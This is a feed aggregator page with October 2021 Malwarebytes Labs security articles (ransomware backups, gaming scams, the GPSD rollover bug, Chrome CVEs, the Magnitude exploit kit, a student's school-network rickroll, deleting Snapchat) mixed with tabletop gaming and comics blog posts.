Feed aggregator

Ransomware: Why do backups fail when you need them most?

Malwarebytes - Fri, 10/22/2021 - 14:11

It’s widely known, and endlessly repeated, that the last, best line of defence against the potentially devastating effects of a ransomware attack is your backups.

So why do we keep hearing things like this:

We’re also feeling relatively confident, we have a very good backup system … and then we find out at about four or five hours after the [ransomware] attack that our backup system is completely gone.

Ski Kacoroski, System administrator, Northshore School District

The quote above comes from a recent Malwarebytes podcast, racing against a real life ransomware attack, in which host David Ruiz interviewed sysadmin Ski Kacoroski about a ransomware attack on the Northshore School District in Washington State.

Kacoroski’s alarming discovery—that the backups he was relying on to restore the school district’s damaged systems were unusable—is not unusual in the aftermath of a ransomware attack. The glib and depressingly common response from some in the IT community is to assume that those involved were idiots, and to blame them for their misfortune, observing with hindsight that they should have known they needed to spend more on this, run that, patch this, check that, etc.

A more realistic, more useful, perspective assumes that system administrators and security folk like Kacoroski are competent, intelligent people who are doing their best to meet multiple requirements in complex environments with limited resources. Starting there, the obvious conclusion from experiences like Kacoroski’s is that backups are hard to get right.

Why do backups fail?

Following the interview with Kacoroski, we set out to find out why getting backups right is so difficult. To help us we approached backup expert Matt Crape, a technical account manager at VMWare, and put exactly that question to him in a follow-up podcast episode, Why backups aren’t a “silver bullet” against ransomware.

This is what we learned from Crape:

Backups are difficult

Crape observed that people often imagine backups are easy, because their only experience of performing backups is doing them at home, where it is easy: You just plug a USB hard drive into your laptop every night and press a button.

But add a few hundred computers and you’re living in a different world.

Step one, says Crape, is figuring out what you’re trying to achieve. To do that you have to work though a series of important but difficult questions, including:

Are you backing up just your data, or your data and your applications? Are you archiving medical information or personally identifiable information that comes with regulatory requirements that dictate where, how, and for how long you can store it? How many copies of the data and applications will you make and where will you keep them? How long will you store each type of data? Do you need versioning? How often are you going to back everything up? Are you going to run the same schedule for all your data, no matter how important it is or how often it changes, or are you going to run different schedules for different things? And how will the scheduling, and the amount of data travlling over the network at different times, affect performance?

A backup archived to tape or the Cloud is only half the story too. It can only be considered a success if you can restore a working system from it, and there are a few things that can derail that.

SQL databases typically have to be stopped before you can take a back up that will usefully restore, for example. Many applications also depend on the existence of other services too (such as DNS, email or authentication) and you’ll need to understand and record those relationships, and have a plan for restoring systems in the right order if you want it all to come back to life.

You also need a process for reviewing those decisions regularly. Businesses evolve and change, and your backups have to keep up.

And finally, having done all that, you’ll need to do something far more difficult—convince someone it’s all worth paying for.

Backups are expensive

According to Crape “That money conversation was always the hardest part”. The problem with backups, he says, is that 99% of the time you don’t need them, so they can seem like money down the drain.

Ransomware changes the calculation considerably. Aside from their day-to-day uses, organisations have historically seen backups as a way to cope with natural disasters and other severe but infrequent events. It is easy to understand why they might put off dealing with that problem until tomorrow in favour of more immediate concerns.

But a ransomware attack isn’t a lightening strike or a once-in-one-hundred-year flood. According to IDC, “more than one third of organizations worldwide have experienced a ransomware attack or breach that blocked access to systems or data in the previous 12 months”. Other organisations might give you slightly different figures, but there’s no doubt that ransomware attacks are frighteningly common.

Crape suggests that the best way to make the argument for properly staffed and funded backups is to make the conversation about the cost of losing key systems: “How much downtime can we afford for this specific server?What’s the cost of that vs the cost of storing backups for three years?”

Backups are targets

“Had the Empire had better physical security for their backup archives, the Star Wars franchise would be markedly different”.

Matt Crape, Technical Account Manager, VMWare

Backups contain all the information that makes a company tick, which makes them targets for both theft and sabotage. For a modern fable on the menace of insider threats and the importance of physical security for backups, just watch Rogue One: A Star Wars Story, says Crape. “The Death Star blew up because of a backup.”

Ransomware gangs understand that your backups could deprive them of a multimillion dollar payday and will seek them out and delete them if they can. It’s also not unusual for criminal hackers to spend days, weeks, or even months inside the networks of organisations they’ve breached. They use that time to perform reconnaissance and elevate their privileges, so they can reach all parts of the network, including its backups (even Cloud backups). If they can find them, they will destroy them before running their ransomware.

When it is finally run, many kinds of ransomware will also look for and disable or delete shadow copies—a form of local backups—on the machines they infect, cutting off the possibility of restoring those machines with a quick rollback.

If your ransomware recovery plan relies on backups, you will need copies of your data that are offline and off-site, where they are permanently beyond the reach of an attacker who may be resident in your network for months.

Everyone assumes they’re working

According to Crape, another reason that backups let us down when we need them most is that people simply assume they are running correctly. “It’s not uncommon to hear about folks who just don’t check the status, ever”, he told Ruiz. “They’ll check it the first couple of days and then it gets old so they stop paying attention to it, or they turn off notifications because it’s just been running fine. You go to do a restore and you find out, oh, this thing hasn’t run in six months.”

It’s not enough to monitor that the application ran without failing, says Crape. A backup job can run without failing, but that doesn’t mean it did anything; and just because the job ran properly, that doesn’t mean the tape isn’t blank; and having something on tape doesn’t mean you have something that will usefully restore.

If you want to know if your backups are working, you have to test them. And that means doing a full restore into another environment.

Listen to the podcast

To learn more about why backups fail and how you can use them to effectively combat ransomware, listen to the full podcast below, or in your favourite podcast player from AppleSpotify, or Google.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

The post Ransomware: Why do backups fail when you need them most? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

We dig into the Game Players Code

Malwarebytes - Fri, 10/22/2021 - 14:00

Gaming security is getting a lot of attention at the moment. Rightly so; it’s a huge target for scammers and malware authors. Malicious ads, fake games, survey scams, phishing attacks…whatever you can think of, it’s in use. Some target kids and steal their accounts, selling them on. Others go after parents, who have their payment details tied to various platforms and consoles. Whatever the scammer is into, rich pickings can be theirs for the taking.

As we’ve shown previously, you don’t even have to be on a gaming platform to be at risk from shenanigans. You can run into something bad and gaming-related purely from hanging out somewhere else. These attacks, these tactics, are pervasive.

Some organisations are trying to turn the tide, however.

Step up to the plate, Game Players Code

Banks are noticing just how much time is spent dealing with gaming theft issues. No doubt their support calls tell a grim tale of cancelled cards and reverse charges. Tip: some gaming platforms will actually ban/cancel a gaming account by default should you ever reverse a dubious charge. Never do this if you can help it.

LLoyds Bank, in response to the never-ending glut of financial gaming fraud, has come up with something called “Shield against scams”. This is designed to give younger gamers a helping hand to avoid video game fakery. They’ve also got some well known gamer influencers on board which can only help get the message in front of gamers. Shall we take a look at each tip and see what else we can add to the discussion?

Chat screening and anonymity

SCREEN any chats from strangers, as well as unexpected gifts and special edition or time-limited offers. Never transfer money to someone you haven’t met in person.

HIDE personal information from others at all times, concealing your personal details where possible to avoid them being leaked.

This is a good start. Concealing player information is also helpful. Gaming forums, databases, and websites are often targeted by compromise and data theft. When the hammer falls, it’s probably best to have as few visible bits of personal information as possible. Always check the privacy specifics of whatever platform you’re using.

Some enable settings like real ID (your actual real name) by default, making it visible to whoever has the correct level of permissions. This could be a friend you’ve added, or random players looking at your profile. Other platforms won’t display real names or locations without you physically typing them into your profile. Consoles are a particular concern here because they have so many different settings across multiple menus. Many of them will have a privacy component to them, but you’ll have to dig around and make those connections yourself. It could be a slow process, so set some time aside for that.

Chat, whether in game or via a client, is an inroad to bad messages. You may even run into bogus messages in chat/VoIP land. The “I accidentally reported you” scam is hitting saturation point at the moment. Last but not least, beware of Real Money Trading if you play massively multiplayer online games.

Be cautious with payments

INVESTIGATE any gaming-related purchases before handing over money, such as checking whether the website is blacklisted on https://sitechecker.pro/blacklist-checker/ and only making card payments that offer greater consumer protections.

Another decent tip. Much of the gaming fraud we see at the moment is related to in-game purchases or DLC. Most commonly weapons, skins, outfits and the like. Some gaming platforms like Steam allow gamers to trade items. Fake trade phishes have been around for years and are very popular.

Evaluating the download risk

EVALUATE whether gaming-related downloads are being made from established trusted sources and whether they are safe by checking for malware via https://www.virustotal.com/

Generally speaking, all gaming downloads should be coming from the source (the platform you’re using) directly. Want to play Diablo 3? You’ll be using the Battle.net client on PC. Steam games? You’ll use the big download button inside the Steam client. Uplay? Origin? Epic store? The same rule applies. On a games console, it’s even more locked in. You can’t exactly go wandering off to a rogue download on a PS4.

As far as these files go, in theory you shouldn’t need to scan them (indeed, it isn’t possible to scan them if they’re on a games console). Sometimes things can go wrong with files from an official source, but this is pretty rare. Apply your own better judgment on this one.

Should you stray outside your walled client garden, that’s the time to be suspicious. Messages about free games, dubious offers/adverts, or random uploads to YouTube promising free cracked copies of the latest titles should be given a wide berth. You can certainly use VirusTotal for a quick check, but you should also read up on what it does. We would always recommend using your dedicated security tools in addition to any web-based scan.

Locking down

LOCK your gaming network by using password managers, two-factor authentication within platforms and anti-virus software.

Good tips. There are many gaming platforms. Some of them have titles exclusive to them, or deals which are better than anywhere else. Even if you decide to stick with Steam, certain games will insist on you also using their creator’s gaming platform. So you could fire up a Far Cry game on Steam, but you may need to launch the Uplay client…via Steam…and the game launches from there.

This may have changed, it’s been a few years since I tried it myself. But this is not an uncommon thing to happen.

Before you know it, you don’t just need a secure email tied to your gaming platform. You need logins for Steam, Uplay, Epic, Blizzard, multiple logins for MMORPG launchers, passwords in consoles, passwords everywhere. A password manager is exactly the kind of solution to this headache.

Two-factor authentication was rather uncommon in most gaming circles years ago, but it’s pretty much the default now. You can have it on your PC gaming clients, your consoles, your email. There’s Google Auth, or dedicated apps depending on the game publisher. Whatever your gaming network of choice, this is almost certainly something you can make use of.

Card safety concerns

DELINK your bank details from gaming and online browser accounts. Having two-factor authentication set up on bank transactions and using prepaid cards will also help to keep your money protected.

Payment information on accounts is a risk, but having payment information on any account can be a risk. The question is what can you put in place to lessen this, and how much damage can someone do if they get that information?

Many gaming clients allow you to store details, or delete them as appropriate. For example, you can tell Steam whether or not to remember payment info. You can also load up an account with funds via the Steam wallet, or put certain amounts of money onto the account with gift cards. Yes, someone can still steal an account and if it has £100 sitting on it, that’s bad. Some may argue that’s actually worse than stored card details.

If payment info is stored in Steam, you still have to enter the verification code on the back of the card for any transaction as this isn’t retained. While an account with details stored on it will still be valuable to someone out there, most people can’t simply start spending. They don’t have the code. However, an account with £100 or £300 sitting on it is an instant spend-festival.

As a result, a good tip is to only load up the account with smaller amounts of cash. It’s still bad if it gets stolen, but not £300 bad.

In conclusion…

Any attempt to make gaming realms more secure is a good thing. While you may have to add a bit more context to the tips as they stand, the basics are in place and that’s what we need to encourage young gamers with. Any positive change in habits, whether from the kids or the parents helping behind the scenes, can only be beneficial for everyone.

The post We dig into the Game Players Code appeared first on Malwarebytes Labs.

Categories: Techie Feeds

On 10 Ways To Open A Chest

Hack & Slash - Fri, 10/22/2021 - 13:00
"But assuming it was a treasure hunting expedition (and the lower floors of the tower were reasonably cleared, with a path of escape blocked only by wandering monster rolls) what would a party need to do in one of your games to safely open a chest?"
Here are 10 ways to open a chest safely!

10. Pour acid in the lock.
9. Use a pick and chisel to break apart the lock mechanism.
8. Use a crowbar and specialized tools to pry the lock out of the chest.
7. Saws!
6. Carry the chest back to town and pay the thieves guild to open it.
5. Hammers!
4. Knock!
3. Unscrew the lid hinges.
2. Pry off the back of the lid!

And the number one way to open a chest safely?

1. Have the thief open it, there's always more where they came from!

Why don't they just do these things by default? They are time consuming, loud, or require heavy encumbrance penalties.

Categories: Tabletop Gaming Blogs

A bug is about to confuse a lot of computers by turning back time 20 years

Malwarebytes - Fri, 10/22/2021 - 12:16

For those of you that remember the fuss about the Y2K bug, this story may sound familiar.

The Cybersecurity & Infrastructure Security Agency (CISA) has issued a warning to Critical Infrastructure (CI) owners and operators, and other users who get the time from GPS, about a GPS Daemon (GPSD) bug in GPSD versions 3.20 through 3.22.


If you don’t remember the Y2K bug, let me remind you quickly. Before the year 2000, lots of computer programs kept track of the year by remembering the last two digits instead of all four. Programs coded this way would work correctly until the first day of the new millennium, when they would assume they’d been transported back in time 100 years to 1900.

Some computer programs don’t care what time it is, but others do, and there were genuine fears that getting the date wrong by -100 years might cause the the lights to go out, or for planes to fall from the sky.

In the end, those big problems didn’t materialize, because everyone received a warning or two, or twenty, way in advance, and there was enough time to take action and fix the broken code.

What’s the bug now?

Alongside telling you where in space you are, the Global Positioning System (GPS) can also tell you where in time you are. To do this, it keeps a count of the number of weeks since January 5, 1980. The main civil GPS signal broadcasts the GPS week number using a 10-bit code with a maximum value of 1,023 weeks. This means every 19.7 years, the GPS week number in the code rolls over to zero.

GPSD is a GPS service daemon for Linux, OpenBSD, Mac OS X, and Windows. It collects data from GPS receivers and makes that data accessible to computers, which can query it on TCP port 2947. It can be found on Android phones, drones, robot submarines, driverless cars, manned military equipment, and all manner of other embedded systems.

Unfortunately, in an echo of the Y2K bug, a flaw in some versions of GPSD could cause time to roll back after October 23, 2021. The buggy versions of the code reportedly subtract 1024 from the week number on October 24, 2021. This would mean Network Time Protocol (NTP) servers using the broken GPSD versions would think it’s March 2002 instead of October 2021.

How bad is it?

For computer systems that have no other time reference, being thrown back in time can cause several security issues. From the perspective of incident handling and incident response, well-synchronized time across systems facilitates log analysis, forensic activities and correlation of events. Losing track of what happened when, can lead to missed incidents.

Even worse is getting shut out. NTP servers using the bugged GPSD version would get thrown back almost 20 years. The Network Time Protocol (NTP) is responsible in many cases to ensure that time is accurately kept. Various businesses and organizations rely on these systems. Authentication mechanisms such as Time-based One-Time Password (TOTP) and Kerberos also rely heavily on time. As such, should there be a severe mismatch in time, users would not be able to authenticate and gain access to systems.

The same would happen in cases where authentication relies on cookies. Websites and services relying on expiring cookies do not respond favorably to cookies from two decades in the future.

And speaking from experience, the last GPS week number reset to zero occurred on April 6, 2019. Many GPS-enabled devices that were not properly designed to account for the rollover event exhibited problems on that date. Other equipment became faulty several months before or after that date, requiring software or firmware patches to restore their function.


Since the affected versions of GPSD are versions 3.20 through 3.22 users should upgrade to version 3.23.1. Going back to older versions such as 3.19 and 3.20 is not recommended since they are unsupported and had bugs. For organizations that are using GPS appliances or rely on GPSD, it is recommended to check if GPSD is being utilized anywhere in the infrastructure and check its corresponding version. It is likely that an upgrade to GPSD will be required if no recent upgrades were performed.

It is also good for system administrators to make a mental note of the date October 24, 2021. If systems that had been authenticating normally start to have authentication issues after the weekend, it could be due to a mismatched date and time.

If you would like to be spared of this roll-back problem completely, the GPS modernization program is adding new civilian signals to the GPS system.

Personal note

Should your system go back to 2002, can you instruct it to tell me to invest in Bitcoin, please?

The post A bug is about to confuse a lot of computers by turning back time 20 years appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Minaria: Muetar

Sorcerer's Skull - Fri, 10/22/2021 - 11:00
Muetar is the largest kingdom of Minaria in land area and possessed of the largest army. Its rulers are the descendants of the Mueta horse lords who first harried the city-states of the Land of the Great Rivers, then were its foederates, until a chieftain general Oyaro (Old Meuta: Hoyaru), forced the Princes of Methluma to give him the title of Supreme General or Warlord. The word, as borrowed into the Muetarian tongue, eventually came to mean "emperor." Oyaro's line came to be the de facto rulers of the land in a military dictatorship that developed over generations into the current feudal state.

The Empire's current ruler is Herrott (Kheroth) of the Pirostar (Phiroshtar) Dynasty. sometimes called "Golden Helm" for brightly polished helmet he wears in battle. Herrott was the second son and given command of the elite guard of the Emperor, but ascended to the throne upon the death of his older brother in a riding accident. While his father's rule was occupied with internal struggles, Herrott turns his eyes toward expanding the empire, but he is cautious and not prone to rash action. He is an avid falconer as well as rider and pampers his prize animals.

Atata, his Empress, is descended form the old Oyarostar line. She has little taste for court gossip or petty intrigues and is judged as aloof and perhaps even severe by her ladies in waiting. Like all Muetarian elite she takes part in the rituals of the martial cult of Anshar (who has absorbed much of the folio and importance of the supreme god Taquamenau in the Muetarian ascendance), but supports a policy of religious tolerance in the Empire. She is an advocate for the poor and is said to use her influence to protect the more moderate clerics of Huisinga--this despite the peasant uprising blamed on radical members of the Sankari sect during the reign of Herrott's father, Maasa. 
Atata is also a patron of the arts and has even brought Ponian theater to the court of Muetar.

Update now! Chrome fixes more security issues

Malwarebytes - Thu, 10/21/2021 - 13:31

For the third time in a month Google has issued an update to patch for several security issues. This time the update patches 19 vulnerabilities, of which 5 are classified as “high” risk vulnerabilities.

In an update announcement for Chrome 95.0.4638.54, Google specifies the 16 vulnerabilities that were found by external researchers.

The CVEs

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

Below are the CVEs attributed to external researchers that got rated as high risk:

  • CVE-2021-37981 (High CVSS 7.7) : Heap buffer overflow in Skia. The vulnerability exists due to a boundary error when processing untrusted HTML content in Skia. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger a heap-based buffer overflow and execute arbitrary code on the target system.
  • CVE-2021-37982 (High CVSS 7.7): Use after free in Incognito. The vulnerability exists due to a use-after-free error within the Incognito component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.
  • CVE-2021-37983 (High CVSS 7.7): Use after free in Dev Tools. The vulnerability exists due to a use-after-free error within the Dev Tools component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.
  • CVE-2021-37984 (High CVSS 7.7): Heap buffer overflow in PDFium. The vulnerability exists due to a boundary error when processing untrusted HTML content in PDFium. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger a heap-based buffer overflow and execute arbitrary code on the target system.
  • CVE-2021-37985 (High CVSS 7.7) : Use after free in V8. The vulnerability exists due to a use-after-free error within the V8 component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.
Heap buffer overflow

A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap. So, by creating a specially crafted input, attackers could use this vulnerability to write code into a memory location where they normally wouldn’t have access.

Use after free

Use after free (UAF) is a vulnerability caused by the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.


Skia was developed as an open-source graphics library, written in C++ which abstracts away platform-specific graphics API. After Google acquired it in 2005, Chrome uses Skia for nearly all graphics operations, including text rendering.


Incognito mode in Google Chrome – and other browsers—is essentially a setting on your web browser to disallow the storing of local data relating to the websites you surf. When surfing the web in this mode, your browsing history will not be recorded.

Dev Tools

Chrome DevTools is a set of web developer tools built directly into the Google Chrome browser. The Chrome DevTools are a set of web authoring and debugging tools that web developers can use to iterate, debug and profile their site.


V8 is Google’s open source JavaScript and WebAssembly engine. Basically, it’s the engine that reads JavaScript V8 and translates the JavaScript code directly into machine code so that computers can actually understand it. This way the code can be run while browsing. WebAssembly is a binary format that allows you to run code from programming languages other than JavaScript on the web efficiently and securely. This format is handled by V8 as well.


Pdfium.Net SDK is the leading .Net library for generating, manipulating and viewing files in the portable document format. It is used in Chrome for displaying PDFs and print preview. It’s also used in Android for PDF rendering.

How to protect yourself

If you’re a Chrome user, you should update to version 95.0.4638.54 as soon as possible. Users of other Chromium browsers should be on the lookout for updates that fix the vulnerabilities they will have in common.

The easiest way to update Chrome is to allow Chrome to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the working exploits. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

Stay safe, everyone!

The post Update now! Chrome fixes more security issues appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Chrome targeted by Magnitude exploit kit

Malwarebytes - Thu, 10/21/2021 - 12:47

Exploit kits (EK) are not as widespread as they used to be. One of the reasons is likely that most exploit kits targeted software that is hardly ever used anymore. Internet Explorer, Silverlight, and Flash Player to name a few, have been deprecated, replaced, and quickly lost their user-base.

So, just when you start thinking there is one less threat to worry much about, researchers have found an exploit kit with a keen interest in Chrome. Which, from a business point of view, makes a lot of sense, since Chrome is close to becoming not just a market leader, but almost a monopolist in the browser market.

Chrome has, at the time of writing, a market share of around 65%. The only other browser that reaches a market share that is over 10% is Safari. So if you are in the business of compromising browsers that visit your website or watch your advertisement, having Chrome users on your target list is a big plus.

Or, as Malwarebytes’ Director of Threat Intelligence, Jérôme Segura, put it:

“The future of exploit kits is via Chrome exploits. This could either be an anomaly or the beginning of a new era with big implications for the years to come.”

Magnitude EK

Enter the Magnitude exploit kit. Researchers have found that the Magnitude EK is actively using two vulnerabilities to exploit Chromium-based browsers. Magnitude is used in malvertising attacks to infect victims who visit compromised websites and its payload of choice is the Magniber ransomware.

The vulnerabilities

CVE-2021-21224 is described as a type confusion in V8 in Google Chrome prior to 90.0.4430.85 which allows a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. V8 is Google’s open source high-performance JavaScript and WebAssembly engine. This vulnerability was patched in April.

CVE-2021-31956 is a Windows NTFS Elevation of Privilege (EoP) vulnerability. This vulnerability can be used in combination with CVE-2021-21224 to escape the Chromium sandbox. This vulnerability was patched in June.


Practically the same combination of vulnerabilities was described in June when Microsoft fixed seven zero-days, including the CVE-2021-131956 we mentioned earlier. Back then, the attacker using these vulnerabilities was dubbed PuzzleMaker. At the time it was unknown which Chrome vulnerability was used by the attacker, but it’s highly likely that it was the same as Magnitude has been found leveraging now.


There is no malicious payload attached to the Magnitude exploits yet, the attack just exfiltrates the victim’s Windows build number. But reportedly, this is Magnitude EK’s standard procedure to test out new exploits, so this could change quickly if they start to see positive results.

How to protect yourself

It is only on rare occasions that we write about vulnerabilities and then tell you there isn’t much to worry about. But in this case, the only people that have anything to worry about are Windows users that browse the web using Chrome or Chromium based browsers (like Edge), but have disabled its automatic updates and haven’t updated since April. You would also have to run on a non-updated Windows system since June, or run Chrome with the –no-sandbox switch (not recommended). And even then all that would happen if you ran across the Magnitude EK (which usually focuses on South Korea) is getting fingerprinted.

But you do understand that you should update your OS and browser nonetheless, right?

Enable automatic updates

If you want to save yourself the trouble of manually installing updates, there are a few things you can do. For Google Chrome (under Windows) you can choose this page as one of the tabs that opens when you run the browser: chrome://settings/help. If there has been an update since the last time you closed your browser, this page will alert you and initiate a download of the update.

In Windows 10 you can select the Start button, then select Settings > Update & security > Windows Update. Select Advanced options, and then under Choose how updates are installed, select Automatic (recommended).

Stay safe, everyone!

The post Chrome targeted by Magnitude exploit kit appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hearing the Owls Hoot in the Day Time

Sorcerer's Skull - Thu, 10/21/2021 - 11:00


Owls Hoot in the Day Time & Other Omens was the title of the 2003 collection of Manly Wade Wellman's John the Balladeer/Silver John stories from Night Shade Books. I have long been a fine of these Appalachian-centered fantasy stories (they were an influence on Weird Adventures). Recently I bought the audiobook of this collection for a work trip. I probably have read these stories in nearly 20 years so it was fun to revisit them and the narrator is just right for the material.

High school student rickrolls entire school district, and gets praised

Malwarebytes - Wed, 10/20/2021 - 16:04

A student at a high school in Cook County successfully hacked into the Internet-of-Things (IoT) devices of one of the largest school districts in Illinois, and gave everyone a surprise.

Minh (aka @WhiteHoodHacker on Twitter) who attends Elk Grove—a name that curiously resembles the home town of legendary anti-hero, Ash Williams—rickrolled the entire Township High School District 214.

In case you don’t know, rickrolling is an internet meme and a type of bait and switch prank wherein people are expecting one thing (clicking a link, for example) but instead are shown a clip of the 1987 song “Never Gonna Give You Up” by Rick Astley instead.

The end-result of Minh’s work, captured by Minh’s brother

“This story isn’t one of those typical rickrolls where students sneak Rick Astley into presentations, talent shows, or Zoom calls,” Minh writes in his personal blog, “I did it by hijacking every networked display in every school to broadcast ‘Never Gonna Give You Up’ in perfect synchronization. Whether it was a TV in a hall, a projector in a classroom, or a jumbotron displaying the lunch menu, as long as it was networked, I hacked it!”

In the post, Minh further revealed that everything started during his freshman year, a time he admitted was “the beginning of my script kiddie phase”. With the help of friends, he was able to scan and find more than 8 million IPs in the internal district network. With that many IPs, he was bound to find devices that were exposed—and he certainly did.

Here’s young Minh, staring back at himself from a security camera he was able to access remotely from his iPad. When informed about this, the district placed camera access behind an access control list (ACL).

Security cameras weren’t the only devices exposed to the student network. Minh was also able to have complete access to the district’s Internet Protocol Television (IPTV) system, a system that delivers multimedia content over IP-based networks. However, he wasn’t able to pull off the school prank he’d been planning until three years later.

Minh called his rickrolling operation “The Big Rick”. Here’s the timeline of events that fateful day. Note that, after the end of the operation, he sent a pentest report to the district’s technical supervisors.

Thanks to scheduling changes schools had to introduce in response to COVID-19 restrictions, Minh and his crew were able to pull off their scheme while avoiding disrupting classes and—yikes!—significant tests. Minh also said that they were prepared to abort the operation if they found that tests were taking place.

Once Minh had finished his prank, he sent a pentest report to the district’s technical supervisors.

“A few days after sending the report through the anonymous email account, we received an email response from D214’s Director of Technology,” Minh continued in his blog, “The director stated that because of our guidelines and documentation, the district would not be pursuing discipline. In fact, he thanked us for our findings and wanted us to present a debrief to the tech team! Later, he revealed the superintendents themselves reviewed and were impressed by our report!”

This is not a typical response from an organization when someone steps forward to show them their technological vulnerabilities. Many in the cybersecurity and tech industries know someone—or have themselves experienced—getting burned by groups or individuals for simply letting them know about what’s wrong with their systems and what they can do better. Let us not forget those two physical penetration testers getting arrested and jailed for doing a job they were hired to do.

Of course, something like this could happen even when there’s support for a bug bounty program. Take, for example, the case of drone-maker, DJI, who offered a bug bounty program but then decided to modify the terms of its scope and attack the security researcher who found major flaws in its product.

It’s no surprise, then, to see Minh’s peers expressed distrust against the D214 administration, even though the latter was open to the possibility of working with him and his crew to remediate and audit the problems.

“We decided I would reveal myself to present our debrief slides with the others remaining anonymous in the Zoom meeting,” Minh continues, “I had planned on announcing my involvement from the beginning since I wanted to publish this blog post. (I was also pretty much the prime suspect anyways.) But, just in case, I scheduled the debrief to take place after I graduated.”

At the end of the day, everything went “extremely well” for everyone involved. Suffice to say, Minh and his crew were one of the lucky ones to belong to a district that is objective enough to see past the prank and focus on the underlying technological vulnerabilities that made it possible to begin with.

The district has also displayed a stance that potentially opens great cybersecurity opportunities not only to Minh and his crew but also to those who aspire to do what they have done in the name of vulnerability disclosure (sans the pranks, of course). This is something that the industry welcomes and what is urgently needed.

“This has been one of the most remarkable experiences I ever had in high school and I thank everyone who helped support me,” Minh concluded.

Let us be the first to say that this fine lady is not the only one doing the happy dance.

(Video by nitw_t on YouTube)

* Image header is taken by Tom Tran

The post High school student rickrolls entire school district, and gets praised appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to delete your Snapchat account

Malwarebytes - Wed, 10/20/2021 - 14:12

Snapchat is an instant messaging app popular with youngsters that allows users to send pictures and videos that are only viewable for short periods.

But while hundreds of millions of daily active users consume and create content with Snapchat, not everyone is pleased with the mobile app.

One of the most significant concerns with Snapchat is that a recipient can record snaps without a creator’s knowledge or consent. And although Snapchat does notify a sender when a recipient takes a screenshot or records a video through proprietary software, some apps allow recipients to circumvent these checks.

If you no longer want to keep your Snapchat account, you can choose to delete it.

How to deactivate your Snapchat account

You may want to deactivate your Snapchat if you just want a break from the app. Currently, there’s no direct way to disable your account temporarily. The only way to deactivate Snapchat is to delete it.

After you delete your Snapchat, the platform gives you 30 days to change your mind before deleting your account permanently. So, to temporarily deactivate your Snapchat, you could cancel the deletion process before the 30-day period ends.

What happens if you delete your Snapchat account?

The instant you complete the Snapchat deletion process, an invisible 30-day timer starts. You now have just over four weeks to change your mind. After 30 days, Snapchat deletes the following data from its database:

  • Account
  • Account settings
  • Friends
  • Snaps
  • Chats
  • Story
  • Device data
  • Location data

According to Snapchat, some of your personal information may remain in the database for “certain legal, security and business needs.”

How to reactivate your Snapchat account

Reactivating your Snapchat account is pretty simple as long as you are still within the 30-day deletion window. Start your Snapchat app and log back in with your credentials. It may take up to 24 hours to reactivate your account.

How to download your Snapchat data

Your Snapchat data carries your login history, account information, profiles, snap and chat history, memories, friends, search history, Bitmoji, and more. You can download your Snapchat data before you delete your account to preserve the information.

  1. Go to accounts.snapchat.com
  2. Log into your account.
  3. Click My Data and then click Submit Request.
  4. You’ll receive a download link to your verified Snapchat email address.
  5. Use the link to download your data.
How to delete your Snapchat account
  1. Go to accounts.snapchat.com
  2. Log into your account.
  3. Scroll down until you see Delete My Account on the Manage My Account page.
  4. Click Delete My Account.
  5. Enter your username and password to confirm.
  6. Click Continue to start the process.
  7. Don’t log into the app again.
  8. Your Snapchat account will be deleted permanently in 30 days.
Can you reactivate your Snapchat account after 30 days?

You won’t be able to log back into your account 30 days after starting the deletion process. However, you can create a new Snapchat account after your old one has expired.

How to protect yourself on social media

Maybe deleting Snapchat is one step too far for you at the moment. If that’s the case, there are steps you can take to help protect yourself while using Snapchat, and any other social media platforms.

Follow our selfie security measures to help prevent your sensitive media from getting into an abuser’s hands. Also avoid these six social media safety sins to help stay secure.

Setting a strong password is also advisable, and make sure each online account you have has a different password. Familiarise yourself with phishing attempts on mobile phones, to lessen the likelihood of you falling for a scam. Lastly, use security for your Android or iOS device to protect against stalkerware and online stalking incidents.

The post How to delete your Snapchat account appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Wednesday Comics: DC, January 1980 (wk 2, pt 1)

Sorcerer's Skull - Wed, 10/20/2021 - 11:00
My goal: read DC Comics' output from January 1980 (cover date) to Crisis! This week, I'm looking at the comics at newsstands around October 23, 1980.

Action Comics #515: Wolfman's story here is an interesting alternate history of the sort the X-Men would do a lot in the 80s (in fact, X-Men #141, "Days of Future Past" is out this same week!). We see a world where Vandal Savage is the absolute ruler and Superman is his dedicated enforcer, completely convinced of Savage's beneficence, until undercover rebel agents Lois Lane and Perry White make him see the light. The issue ends with Superman vowing to make Savage pay. It's odd seeing the very Silver Age Curt Swan drawing this sort of "modern" story.
